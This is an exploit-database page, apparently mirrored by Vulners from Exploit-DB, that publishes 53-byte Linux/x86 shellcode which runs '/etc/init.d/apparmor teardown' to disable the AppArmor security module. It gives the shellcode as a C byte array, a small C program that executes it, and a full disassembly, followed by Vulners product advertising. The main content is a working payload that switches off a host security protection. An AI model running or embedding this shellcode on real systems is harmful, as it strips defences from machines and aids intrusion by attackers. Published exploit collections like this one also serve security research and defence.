Lucene search
K

Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)

🗓️ 01 Jan 2009 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Linux/x86 apparmor shutdown shellcode (53 bytes

Code
Name = John Babio
Twitter = 3vi1john

/etc/init.d/apparmor teardown

const char sc[] = "\x6a\x0b\x58\x31\xd2\x52\x68\x64\x6f\x77\x6e\x68\x74\x65\x61\x72\x89\xe1"
"\x52\x68\x72\x6d\x6f\x72\x68\x61\x70\x70\x61\x68\x74\x2e\x64\x2f\x68\x2f\x69\x6e\x69\x68\x2f"
"\x65\x74\x63\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";

main(){
      int (*shell)();
      shell=sc;
      shell();
    }

08048060 <_start>:
 8048060:    6a 0b                    push   $0xb
 8048062:    58                       pop    %eax
 8048063:    31 d2                    xor    %edx,%edx
 8048065:    52                       push   %edx
 8048066:    68 64 6f 77 6e           push   $0x6e776f64
 804806b:    68 74 65 61 72           push   $0x72616574
 8048070:    89 e1                    mov    %esp,%ecx
 8048072:    52                       push   %edx
 8048073:    68 72 6d 6f 72           push   $0x726f6d72
 8048078:    68 61 70 70 61           push   $0x61707061
 804807d:    68 74 2e 64 2f           push   $0x2f642e74
 8048082:    68 2f 69 6e 69           push   $0x696e692f
 8048087:    68 2f 65 74 63           push   $0x6374652f
 804808c:    89 e3                    mov    %esp,%ebx
 804808e:    52                       push   %edx
 804808f:    51                       push   %ecx
 8048090:    53                       push   %ebx
 8048091:    89 e1                    mov    %esp,%ecx
 8048093:    cd 80                    int    $0x80

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1
25